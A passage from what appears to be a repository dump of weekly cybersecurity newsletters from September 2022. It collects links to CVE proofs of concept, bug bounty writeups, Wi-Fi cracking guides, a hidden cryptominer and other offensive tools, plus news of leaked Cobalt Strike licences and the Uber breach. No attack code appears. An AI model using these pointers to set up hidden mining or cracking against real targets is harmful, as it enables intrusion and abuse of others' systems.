IoT, OS & Hardware** - 4\n      \n      - [SilentCryptoMiner](https://github.com/UnamSanctam/SilentCryptoMiner) -> A free silent (hidden) native cryptocurrency miner capable of mining ETH, ETC, XMR, RTM and much more, with many features suited for mining silently.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n      - [WES-NG - Windows Exploit Suggester - Next Generation.](https://github.com/bitsadmin/wesng) - A tool based on the output of Windows' systeminfo utility that lists the vulnerabilities the OS is affected by, including any public exploits for them. Every Windows OS between Windows XP and Windows 11, including their Windows Server counterparts, is supported. An in-depth article on WES-NG is available at the BITSADMIN blog: [Windows Security Updates for Hackers.](https://blog.bitsadmin.com/blog/windows-security-updates-for-hackers)\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wi-Fi adapter and a HackRF One for hacking drones.\n\n </details> \n \n ---\n \n *SAVE TIME*\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) 
[![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n  ---\n  \n### 🤝🤝🤝 How to get involved in contributing. #Contact-Us 🤝🤝🤝\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n<details>\n<summary><b>Preview</b></summary>\n \n    If you want to get involved in making **Weekly Cybersecurity Update** better but aren't sure how,\n    contact \"@Attr1b\" on Telegram or mail us at \"resethackerofficial@gmail.com\".\n    \n    Please write a short note on how you plan to contribute.\n </details>\n\n \n#### I'm so grateful to all the [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) whose writeups, articles, findings and whitepapers made the [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) possible.\n\n#### I'm very grateful to all the [organizations, groups and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support, getting the \"Weekly InfoSec Update\" to hackers would not have been possible.\n\n#### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly to the mail, I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them.\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n \n Here are the Agenda for *Weekly infosec Update v0.5* : **14th September - 20th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the *Navbar* bellow and click on **Priview** to see the Details:\n- Open all relevent Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIUv0 
4](https://user-images.githubusercontent.com/25515871/189512256-bb51318d-3d0a-41a6-b3b9-a69cd98c2f2a.png)\n\nHuge thanks to our awesome [community leaders for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n\n<details>\n<summary><b>Preview</b></summary>\n  - Contributors: Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n</details>\n \n---\n\n### Let's start with the EVENT recap, and my apologies for so much info. We're finding a way to make it organized and user friendly.\n<span id=\"title-event\"></span>\n### 🎫🎫🎫 EVENT recap 🎫🎫🎫\n \nThis week, THREATCON 2022 and the Null Delhi meetup registration were mainly trending on Twitter. We have collected publicly available talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars so you don't miss them and can watch them at a time that suits you.\n\n<details>\n<summary><b>Preview</b></summary>\n\n- **Conferences**\n   - At THREAT CON SEP 2022, Akshay & Bharath shared their talk [Frida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n- **Webinars and videos**\n   - The Null Delhi September Meetup is scheduled for 24 Sep 2022 at the @esecforte office in Gurugram. You can [register here](https://null.community/events/844-delhi-monthly-meetup)\n   - For red teamers, this is a really awesome video (watch it with subtitles) in which @lsecqt demonstrates a [walkthrough of Sliver C2, a brand new (and still in development) command and control framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). 
It only has a CLI version (for now) and is designed to be extremely easy to install and work with.\n\n- **Ongoing/Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎**:   \n \n   - MSSP Alert Live : 19th-21st September | Washington DC\n   - CSO50 : 19th-21st September | Washington DC \n   - Fal.Con 2022 : 19th-21st September | Las Vegas \n   - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n   - BSides Singapore Conference 2022 : 22nd-23rd September\n   - InfoSec World 2022 : 26th-28th September | Orlando \n  \n</details> \n  \n---\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : PoC exploits and CVE analysis 🪲🪲🪲\n\n#### Week -> [14th September - 20th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nTens of thousands of vulnerabilities are disclosed each year, and only a handful of them will ever be exploited. So in this section, every week we filter out [CVE PoCs and analyse the CVE writeups that have higher severity.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) Click the link to see all the mentioned PoCs, analyses and exploits.\n\n<details> \n<summary><b>Preview</b></summary>\n\n \n        Security Patched :   Latest IT security vulnerabilities patched within this week by selected companies such as Apple, Google,\n                             Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc.\n        \n        CVE:ANALYSIS & POC:  CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps.\n                          \n         \n        CVE POC :            CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709,\n                             CVE-2022-33980, CVE-2019-2215 & GwisinMsi PoC based on the Recreating an MSI Payload for Fun and no profit blog.   
\n \n\n Note - If you don't work with CVEs, please skip this section.\n</details> \n\n<span id=\"title-bb\"></span>\n### 🐞🐞🐞 BUG BOUNTY : reports, vulnerability writeups and resources 🐞🐞🐞\n\nIn this beginner-friendly domain, we have 2 segments:\n- **1.  Hackerone/Bugcrowd reports for Bug Hunters**\n- **2.  Bug bounty writeups, tips & resources**\n\nLast week, @intigriti asked the community for pickup lines for bug hunters, and one of my favourites was\n- You're like a P1: special and hard to find.\n\n<details> \n<summary><b>Preview</b></summary>\n \n *1. In this segment, we have filtered out the top **HACKERONE/BUGCROWD REPORTS** for bug hunters:*\n   - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n   - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n   - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n   - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n\n *2. 
In this beginner-friendly segment, we collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***   \n   - @Mohsinkhan answered a question for new bug hunters in the article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n   - In this article, @AkashVenky talks about [Network Segmentation Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and how it can be used to validate that less-secure networks are properly isolated.\n \n   - @302Found released [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756), and in case you have not read it, here is [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n  \n   - @zer0d shared a writeup explaining [how he found 3 vulnerabilities in a day](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e); the three were a bypass of the one-time usage of the sign-in link, a credit card checker bypass, and e-mail bombing (missing rate limit).\n \n   - @OmarHashem shared a story on how he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n   - Bug hunter @viruszzwarning observed that many websites have a specific type of vulnerability, directory listing, and that this is [leaking their clients' identification details, like Aadhaar card, PAN card, bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n   - A few months back I shared a video about Bun (a new open source runtime environment created by Jarred Sumner and over 40 contributors) 
where developers are predicting that [Bun, an incredibly fast all-in-one JavaScript runtime, is going to replace Node.js](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters, you should keep an eye on this.\n \n  </details>  \n\n---  \n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  In this segment, we collect amazing things from all over the infosec domain for researchers and professionals who want to explore security, are looking for new approaches to finding vulnerabilities, or want to keep track of the infosec market and startups. \n\nHere we have:\n   - **1 - Web Security and Android security**\n   - **2 - Cloud Security**\n   - **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **4 - Infosec Business, Funding and Market**\n  \n  Bug hunters or junior pentesters can skip this section, or check out just the Web Security & Android security part.\n\n<details>\n<summary><b>Preview</b></summary>\n   \n - **1 - Web Security and Android security**\n     - [CompTIA Pentest+ certification review after 2nd attempt](https://notes.n3m3515.space/pentest/comptia-pentest-002-notes) by Inside \n     - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli\n     - A security expert's [guide to scanning unpatched WordPress blogs](https://blog.criminalip.io/2022/09/13/wordpress-vulnerability/)\n     - A report by WPSCAN.COM demonstrating [HOW TO: FIND WORDPRESS PLUGIN VULNS](https://drive.google.com/file/d/1DlzXw2iNvLXzm-it5G6nwENnL0v7zcrk/view?usp=sharing)\n     - @hakluke & @pry0cc wrote a blog for ProjectDiscovery: [Guide to DNS takeovers 😊](https://blog.projectdiscovery.io/guide-to-dns-takeovers/)\n     - Tamir describes in this article how he found CVE-2021-1961, [Attacking the Android kernel using the Qualcomm TrustZone](https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone), where an Android kernel exploit utilizes the TrustZone in order to compromise the 
kernel.\n \n  - **2 - Cloud Security**\n     - [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/) -> The purpose of this matrix is to conceptualize the known TTPs that adversaries may use against Azure.\n     - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n     - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n   \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - Practical guidance for [IT admins responding to ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n     - [How to kick off an incident response investigation for a compromised SaaS account](https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/), by Johann Scheepers.\n     - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n     - [Cross-Layer Security: A Holistic View of Internet Security](https://freedom-to-tinker.com/2022/09/20/cross-layer-security-a-holistic-view-of-internet-security/), by Henry Birge-Lee, Liang Wang, Grace Cimaszewski, Jennifer Rexford and Prateek Mittal.\n     - [The Evolution of the Chromeloader Malware](https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html)\n     - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n     - [Efficient Proofs of Software Exploitability for Real-world Processors](https://eprint.iacr.org/2022/1223)\n   \n  - **Red Team**\n     - [Windows Kernel Exploitation instructions](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and 
loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n     - How to [crack a WEP key using only one data packet and a wordlist, and then use Wireshark to decrypt the data packet](https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/)\n     - How to [crack the key of a WEP-encrypted Wi-Fi network](https://tbhaxor.com/pivot-through-protected-wifi-network/) and pivot into it to interact with vulnerable services running on it.\n     - How to [capture 2 of the 4 EAPOL handshake messages of a WPA network](https://tbhaxor.com/cracking-wpa-psk-using-aircrack/) and crack the password from a wordlist. \n     - How to [set up a honeypot access point with hostapd and capture the EAPOL handshake from a probing client to brute-force the pre-shared key.](https://tbhaxor.com/crack-wpa-psk-from-probing-clients-without-access-point/)\n     - [Shellcode Injection in C# - Part 3](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/) - using the QueueUserAPC API call, by Ahmed Sher.\n \n \n - **4 - Infosec Business, Funding and Market** \n     \n      - [CISA Strategic Plan for 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n      - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n    \n    - InfoSec Market\n      - [Understand the Indian market and who is the right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n      - [Cybersecurity Funding Review for August 2022](https://www.returnonsecurity.com/cybersecurity-funding-review-august-2022/?utm_source=securityfundednewsletter), by Mike P.\n      - [Global Automotive Cybersecurity Market to Reach $5.3 Billion by 2026](https://www.prnewswire.com/news-releases/global-automotive-cybersecurity-market-to-reach-5-3-billion-by-2026--301622955.html?utm_source=securityfundednewsletter)\n   
   \n  </details>\n\n---\n  \n<span id=\"title-news\"></span>\n### 📰📰📰 NEWS 📰📰📰\n\nHere we have 3 segments:\n - **1. Twitter Threads & Tips**\n - **2. Data Breach & BlackHat Hackers Leaked**\n - **3. Top Infosec News**\n \n <details> \n<summary><b>Preview</b></summary>\n  \n- **TWITTER THREAD & TIPS**\n    \n    - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n    - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [malware in @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19). On 19th Sept, Cyble Research and Intelligence Labs (CRIL) published a blog investigating @idclickthat's tweet, and it turned out to be a [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/)\n    - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n    - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his [1st YouTube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n    \n- **Leaks & BlackHat Hackers: Source Unknown**\n   \n   - 🔴 **News - Paid Tools** that have been leaked or cracked by black hat hackers: Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1, Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n   - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over an onion site, and the Conti source code for v3.7.7 and the Taurus bot source code have been leaked. \n   \n   - 🔴 \"UBER GOT HACKED\". 
After a few days Uber officially acknowledged the data breach and stated that the Lapsus$ group was behind the attack, but the hacker group vx-underground and individuals such as ColtonSeal and Kevin shared multiple screenshots where the hacker claimed responsibility, mocked Uber's security and shared the unconfirmed method of breach:\n      - Socially engineer an employee to get on their VPN (could have been prevented with WebAuthn / hardware 2FA)\n      - Once on the VPN, scan their intranet and find a network share\n      - The network share contained PowerShell scripts with the username and password of an admin user in Thycotic (PAM). Using this, the hacker was able to extract secrets for all services: DA, DUO, OneLogin, AWS, GSuite, domain admin, AWS instances, the HackerOne administration panel, and more.\n      - From there they could get full access to all systems.\n      - When the individual breached Uber, they sent a Slack notification to everyone informing them the company had been breached. Employees thought it was a joke.\n\n - **Top Infosec News:** \n\n   - 🟢 **Announcement** : \n      - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features)\n      - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day vulnerability.\n      - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.\n   - 🟢 TikTok still denies a security breach of 2 billion users' information after hackers leaked user data and source code. 
\n   - 🟢 Rockstar Games confirms a hacker stole early Grand Theft Auto 6 footage, and Uber also confirms that its data was leaked by the Lapsus$ group.\n   - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n   - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by BleepingComputer.\n </details> \n  \n---\n  \n<span id=\"title-hiring\"></span>\n### 🕴️🕴️🕴️ HIRING, COURSES & TRAINING 🕴️🕴️🕴️\n \nIn this beginner-friendly segment, we talk about and share the latest resources related to jobs this month, interview questions and free training offered by organizations, communities and leaders.\n\n<details> \n  <summary><b>Preview</b></summary>\n \n1. Take a look at [Internship/Job Openings in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n </details> \n  \n---\n\n  <span id=\"title-tools\"></span>\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools, and every week we filter out the most in-demand and helpful tools that serve hackers' purposes in different domains.\n\n -  **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5 Tools\n -  **2. Cloud Security** - 3 Tools\n -  **3. Blue/Red Team/Threat Intelligence Tools** - 5 Tools\n -  **4. Reverse Engineering & OSINT** - 3 Tools\n -  **5. IoT, OS & Hardware** - 3 Tools\n\n<details>\n<summary><b>Preview</b></summary>\n  \n - **1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n    \n    - [CATS](https://github.com/Endava/cats) -> REST API fuzzer and negative testing tool for OpenAPI endpoints, by Endava, and a detailed tutorial on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by KitPloit.\n    - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLi tester for HTTP headers, by [Kun](https://twitter.com/root_tanishq)\n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information gathering automation tool.\n    - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a Swiss army knife for darkweb crawling. It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and a screenshot of that view.\n    - [requests-ip-rotator](https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing. \n  \n      \n - **2. Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n \n - **3. Blue/Red/Purple Team, IR and Threat Intelligence Tools** - 5\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. 
It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n     - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom), which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speed.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicts the probability of an exploit being released after a CVE is published (using a machine learning model); the project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n     - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n  \n - **4. Reverse Engineering & OSINT Tools** - 3\n     - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.\n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.\n  \n  - **5. 
IoT, OS & Hardware** - 3\n      \n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack interface lockscreens, Metasploit and more Android/iOS hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB WiFi adapter and HackRF One for hacking drones.\n\n </details> \n \n ---\n \n *SAVE TIME*\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n  ---\n  \n### 🤝🤝🤝 How to get involved in contributing. 
#Contact-Us 🤝🤝🤝\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n<details>\n<summary><b>Preview</b></summary>\n \n    If you want to get involved quickly in making **Weekly Cybersecurity Update** better, but aren't sure how,\n    CONTACT \"@Attr1b\" on Telegram or mail us at \"resethackerofficial@gmail.com\" \n    \n    Please include a reason and how you plan to contribute.\n </details>\n\n \n#### I'm so grateful to all the [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md); without their writeups, articles, findings and whitepapers the [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n#### I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support, getting the \"Weekly InfoSec Update\" to hackers would not have been possible.\n\n#### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly to the mail, I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them.\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md",
    "content": "#### Hey Hackers, I hope you’ve been doing well over the weekend! The quote of the week is \"Don't rush the Process. Good Things Take Time.\"\n Here is the agenda for *Weekly Infosec Update v0.6* : **21st-27th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n**Tips to SAVE TIME & how to READ this newsletter 👇**\n- Select the topic from the *Navbar* below and click on **Preview** and the **Arrow (>)** to see the details.\n- Open all relevant titles in a new tab (Ctrl+Click), then READ them one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : PoC exploits and CVE analysis 🪲🪲🪲\n\n#### Week -> [21st September - 27th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n> There are tens of thousands of vulnerabilities disclosed each week. 
